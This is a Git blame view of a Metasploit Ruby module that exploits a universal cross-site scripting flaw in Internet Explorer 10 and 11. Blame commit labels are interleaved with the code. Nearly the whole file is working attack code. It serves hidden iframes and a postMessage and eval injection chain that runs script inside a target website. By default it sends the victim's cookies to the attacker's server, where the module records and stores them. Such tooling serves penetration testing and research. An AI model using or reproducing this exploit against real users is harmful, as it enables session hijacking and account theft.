infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/modules/auxiliary/gather/ie_uxss_injection.rb

154 lines
4.4 KiB
Ruby
Raw Normal View History

IE UXSS
2015-02-05 09:03:28 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
Another update Thanks @joevennix
2015-02-05 18:23:32 +00:00
'Name' => "Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
IE UXSS
2015-02-05 09:03:28 +00:00
'Description' => %q{
An update
2015-02-05 17:29:52 +00:00
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
Another update
2015-02-05 19:08:33 +00:00
Explorer 10 and 11. By default, you will steal the cookie of a specific website (set by the
TARGET_URI datastore option), but you can use your own custom JavaScript by setting the
CUSTOMJS option. You might need to configure the URIHOST option if you are behind NAT.
IE UXSS
2015-02-05 09:03:28 +00:00
},
'License' => MSF_LICENSE,
Final
2015-02-05 10:36:44 +00:00
'Author' =>
[
An update
2015-02-05 17:29:52 +00:00
'David Leo', # Original discovery
'filedescriptor', # PoC
Credit @joevennix
2015-02-05 18:25:38 +00:00
'joev', # He figured it out really
An update
2015-02-05 17:29:52 +00:00
'sinn3r' # MSF
Final
2015-02-05 10:36:44 +00:00
],
IE UXSS
2015-02-05 09:03:28 +00:00
'References' =>
[
Final
2015-02-05 10:36:44 +00:00
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
IE UXSS
2015-02-05 09:03:28 +00:00
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
],
'Platform' => 'win',
'DisclosureDate' => "Feb 2 2015"
))
register_options(
[
Another update Thanks @joevennix
2015-02-05 18:23:32 +00:00
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
IE UXSS
2015-02-05 09:03:28 +00:00
], self.class)
end
def setup
if target_uri !~ /^http/i
raise Msf::OptionValidateError.new(['TARGET_URI'])
end
super
end
def target_uri
Another update
2015-02-05 18:01:19 +00:00
datastore['TARGET_URI']
IE UXSS
2015-02-05 09:03:28 +00:00
end
def get_html
@html ||= html
end
Final
2015-02-05 10:36:44 +00:00
def ninja_cookie_stealer_name
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
end
def get_uri(cli=self.cli)
Another update
2015-02-05 17:46:38 +00:00
ssl = datastore["SSL"]
Final
2015-02-05 10:36:44 +00:00
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
host = datastore['URIHOST']
elsif (cli and cli.peerhost)
host = Rex::Socket.source_address(cli.peerhost)
else
host = srvhost_addr
end
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
if datastore['URIPORT'] != 0
port = ':' + datastore['URIPORT'].to_s
elsif (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
port = ''
else
port = ":" + datastore["SRVPORT"].to_s
end
uri = proto + host + port + get_resource
uri
end
def server_uri
@server_uri ||= get_uri
end
Another update Thanks @joevennix
2015-02-05 18:23:32 +00:00
def js
datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
end
IE UXSS
2015-02-05 09:03:28 +00:00
def html
%Q|
Final
2015-02-05 10:36:44 +00:00
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
IE UXSS
2015-02-05 09:03:28 +00:00
<script>
Another update Thanks @joevennix
2015-02-05 18:23:32 +00:00
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
Final
2015-02-05 10:36:44 +00:00
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
IE UXSS
2015-02-05 09:03:28 +00:00
</script>
|
end
def run
exploit
end
Final
2015-02-05 10:36:44 +00:00
def extract_cookie(uri)
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
end
IE UXSS
2015-02-05 09:03:28 +00:00
def on_request_uri(cli, request)
case request.uri
when /redirect\.php/
An update
2015-02-05 17:29:52 +00:00
print_status("Sending redirect")
IE UXSS
2015-02-05 09:03:28 +00:00
send_redirect(cli, "#{datastore['TARGET_URI']}")
Final
2015-02-05 10:36:44 +00:00
when /sleep\.php/
sleep(3)
IE UXSS
2015-02-05 09:03:28 +00:00
send_response(cli, '')
Final
2015-02-05 10:36:44 +00:00
when /#{ninja_cookie_stealer_name}/
data = extract_cookie(request.uri)
if data.blank?
print_status("The XSS worked, but no cookie")
else
print_status("Got cookie")
print_line(data)
Change public ip option name and store cookie to db
2015-02-05 15:48:45 +00:00
report_note(
:host => cli.peerhost,
:type => 'ie.cookie',
:data => data
)
Use store_loot to store coookie
2015-02-05 17:36:35 +00:00
path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
vprint_good("Cookie stored as: #{path}")
Final
2015-02-05 10:36:44 +00:00
end
IE UXSS
2015-02-05 09:03:28 +00:00
else
An update
2015-02-05 17:29:52 +00:00
print_status("Sending HTML")
IE UXSS
2015-02-05 09:03:28 +00:00
send_response(cli, get_html)
end
end
end